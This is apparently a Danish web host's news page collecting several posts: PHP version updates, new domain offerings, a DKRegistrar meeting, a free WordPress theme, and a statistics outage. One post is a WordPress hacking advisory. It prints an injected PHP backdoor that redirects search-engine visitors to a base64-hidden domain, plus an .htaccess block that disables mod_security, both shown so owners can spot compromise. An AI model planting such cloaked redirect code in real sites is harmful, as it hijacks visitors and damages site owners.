PHP opdateret til version 5.2.8
Vi har i nat opdateret webserverne, så de benytter PHP version 5.2.8. Flere end 170 fejl er rettet siden version 5.2.6.
En fuld liste over ændringer kan ses på php.net.
Vi har i nat opdateret webserverne, så de benytter PHP version 5.2.8. Flere end 170 fejl er rettet siden version 5.2.6.
En fuld liste over ændringer kan ses på php.net.
Gigahost kan nu registrere og overføre følgende nye typer domæner:
.ag, .asia, .bz, .cn, .hn, .lc, .me, .mobi
Som et tidsbegrænset tilbud koster et .cn-domæne kun 15 kr. inkl. moms! Øvrige priser for registrering og forlængelse af domæner kan findes i kontrolcenteret.
Opdatering juni 2010: Vi kan ikke længere registrere .cn-domæner da kravene for at registrere dem er blevet for strenge.
Eftersom WordPress bliver mere og mere populært, er blogs drevet af WP mere og mere udsatte for hacker angreb og forsøg på at “hijacke” blogs. Den seneste stykke tid er en lang række blogs blevet overtaget af spammere og hackere, der ikke “overtager” bloggen helt, men lægger skjult kode ind, back-doors, annoncer og specielt links til spam sider.
Selvom WordPress er et af de mest sikre blogging platforme, bliver nye sikkerhedshuller hele tiden fundet (og lappet hurtigst muligt). Husk derfor at altid opdatere med den nyeste version af WordPress.
Hvis du ikke har den seneste udgave af WordPress, 2.5.1, er der stor sandsynlighed for at din side er hacket, selvom alt virker som det skal. Det sker ofte at der er lagt en backdoor ind, så hackeren har adgang til din blog, samt din adgangskode også kendes af hackeren. Vi anbefaler at du:
Tjek derefter grundigt alle filer i det WordPress tema du bruger, da disse ikke bliver opgraderet. Det er som regel her at skjult kode bliver lagt ind, hovedsageligt med kommandoerne eval()
og base64_decode()
. Kig efter kode der ser sådan ud, som regel i din header.php:
<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol",
"cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWxc0cy5uZXQ=")."/"); exit; }? >
Hackere bruger kode som denne (mere kode her) for at lægge skjulte links ind på din side, der ikke kan ses af dem der besøger siden, men kun af søgemaskinerne. Tjek derfor alle filer for kode og specielt links der ikke burde være der.
Der er også fundet eksempler på at hackere bruger .htaccess til at få adgang til WP-Admin. Åbn din .htaccess fil, som ligger i din WordPress-mappe. Hvis der ikke er ændret noget, skal den se sådan ud:
# BEGIN WordPress RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [ L] # END WordPress
Disse linjer kan også være der:
<if module mod_security.c> <files async-upload.php> SecFilterEngine Off> SecFilterScanPOST Off> </files> </ifmodule>
Hvis der er andet kode end det du har tilføjet det, er det bedst at du opdaterer alle dine WordPress filer (inklusive .htaccess, selvfølgeligt).
WordPress blogs bliver automatisk scannet af hackere efter version, på den måde er det nemmere at finde, og hacke, gamle blogs. WordPress bruger en meta tag til at vise hvilken version det er, der ser sådan ud:
<meta content="WordPress <?php bloginfo(’version’); ? />" name="generator" />
Du kan med fordel fjerne denne kode fra din header.php.
< ?php header("Location: http://www.ditdomæne.dk");?>
i en index.php fil og upload den.Til sidst kan du læse om blogs der er blevet udsat for hacking, og deres erfaringer. Læs her, her, her, og her.
I morgen, den 27. maj fra kl. 14:00, vil brancheforeningen for leverandører af domænenavne i Danmark, DKRegistrar, holde et offentligt informationsmøde om udbuddet af .dk-domænet.
Gigahost deltager aktivt som medlem af bestyrelsen i DKRegistrar med det formål at skabe bedre vilkår for vores kunder i forbindelse med domæner. Vi vil derfor gerne indbyde alle interesserede til at møde op på følgende adresse:
Salen – Valby KulturhusHoldet bag scriptsproget PHP har udgivet version 5.2.6 af PHP. I denne udgave er en række mindre fejl og sikkerhedsmæssige forhold blevet rettet. Hvis du har valgt at benytte PHP 5 i kontrolcenteret, vil du automatisk benytte den nye version.
Et par Gigahost kunder har i de sidste par dage oplevet at deres sider er blevet hacket, i de fleste tilfælde af “Muslem Hacker” eller “Saudi Arabian hacker”. På grund af visse tegninger er danske websider mere udsatte i disse dage. Her er et par sikkerhedstips til din side.
Hos Gigahost bruger vi WordPress ikke kun til vores blog, men også som CMS til vores supportsektion.
Vi er derfor stolte af at præsentere Gigahost WordPress Blogtema — der udgives gratis under open source GPL-licensen. Temaet er kompatibelt med den nyeste WordPress-udgave (2.3.3).
For at bruge det nye tema, upload mappen “ghtheme” til “themes” folderen i din WordPress installation (wp-content/themes/), gå derefter ind under “Presentation” og aktiver dit nye tema.
Download Gigahost Blog Theme – v1.0
Vi hilser alle kommentarer og forslag velkomne.
Den seneste stykke tid har der været problemer med at får vist statistik for visse domæner. Vi er i gang med at rette fejlen og opdatere vores statistiksystem. Vi arbejder på at kunne løse problemet hurtigst muligt, og uden at noget statistik går tabt.
Vi beklager fejlen, og gør alt hvad vi kan for at løse problemet hurtigst muligt, og på den rigtige måde, så fejlen ikke sker i fremtiden.
[Update] Statistikken burde virke nu. Der kan dog stadig være visse domæner der ikke har statistik. Hvis dette er tilfældet og du har domæner uden statistik, må du meget gerne skrive til support (sammen med en liste over domænerne), og vi vil kigge på sagen.